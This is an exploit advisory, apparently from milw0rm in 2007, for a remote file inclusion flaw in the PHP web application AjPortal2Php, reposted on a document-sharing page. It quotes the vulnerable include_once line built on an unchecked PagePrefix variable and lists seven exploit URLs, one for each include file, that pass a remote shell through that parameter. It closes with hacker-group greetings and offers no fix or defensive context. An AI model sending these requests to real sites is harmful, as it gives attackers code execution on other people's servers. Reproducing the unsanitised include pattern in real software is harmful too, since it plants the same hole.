Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 #   [ AjPortal2Php]
2
3 # Class:     File Include Vulnerability
4
5 # Remote:    Yes
6
7 # Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip
8
9 # Author:    Alkomandoz Hacker
10
11 # Contact:   alkomandoz−hacker@hotmail.com
12
13 #############################################################
14
15 file ;
16
17 begin.inc.php
18 connection.inc.php
19 events.inc.php
20 footer.inc.php
21 header.inc.php
22 menuleft.inc.php
23 pages.inc.php
24
25
26 ======================================================
27 Vuln Code
28
29 include_once($PagePrefix.’includes/configuration.inc.php’);
30
31
32
33 =======================================================
34 Exploit :
35
36 [AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
37 [AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
38 [AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
39 [AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
40 [AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
41 [AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
42 [AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell
43
44
45
46 −−−−  Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB−MaY GrOuPs ] [CiTy Of GhOsTs]
47
48 −−−− GreeTz: All www.Asb−May.Net & WwW.MoHaNdKo.CoM
49
50 # milw0rm.com [2007−04−17]
Page 1/1
AjPortal2Php PagePrefix Remote File Inclusion Vulnerabilities
Alkomandoz Hacker
04/17/2007
